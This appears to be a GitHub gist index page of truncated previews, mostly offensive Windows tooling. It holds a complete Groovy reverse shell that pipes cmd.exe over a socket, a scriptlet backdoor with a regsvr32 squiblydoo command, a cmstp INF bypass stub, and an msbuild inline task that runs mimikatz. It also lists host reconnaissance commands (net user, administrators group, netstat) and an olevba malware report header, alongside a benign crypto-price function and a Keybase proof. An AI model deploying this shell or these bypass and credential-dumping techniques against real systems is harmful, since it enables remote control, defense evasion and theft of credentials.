View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
View test.inf
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
View test.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
View Commands.txt
Author: Casey Smith @subTee
ipconfig /all>> C:\Tools\Debug\1.txt
tasklist /v >> C:\Tools\Debug\1.txt
net user >>C:\Tools\Debug\1.txt
net localgroup administrators>>C:\Tools\Debug\1.txt
netstat -ano >> C:\Tools\Debug\1.txt
net use >> C:\Tools\Debug\1.txt
net view >> C:\Tools\Debug\1.txt
net view /domain >> C:\Tools\Debug\1.txt
View Backdoor.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
View Katz.Proj
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes mimikatz. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
View malware.txt
## uploaded by @JohnLaTwC
## sample hash: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
MHT:MASIHB-- 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
===============================================================================
FILE: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
Type: MHTML
-------------------------------------------------------------------------------
View gist:cd5d5c714fd69691d80650887c3d5d75
//from: https://github.com/rathergood/Crypto-Currency-Price/blob/master/ccprice
//returns price (or other info) of cryptocurrency from coinmarketcap api.
//takes two parameters, the name of the cryptocurrency and info that you want returned about the cc
//example: =ccprice("ethereum", "USD")
//example2 =ccprice("ethereum", "24h_volume_usd")
function ccprice(name, currency)
{
View keybase.md

Keybase proof

I hereby claim:

  • I am carnal0wnage on github.
  • I am carnal0wnage (https://keybase.io/carnal0wnage) on keybase.
  • I have a public key ASBAbr1taoZoDoZ5mQsko2BW675dxHpNRP-cenmfGfO03Qo

To claim this, I am signing this object: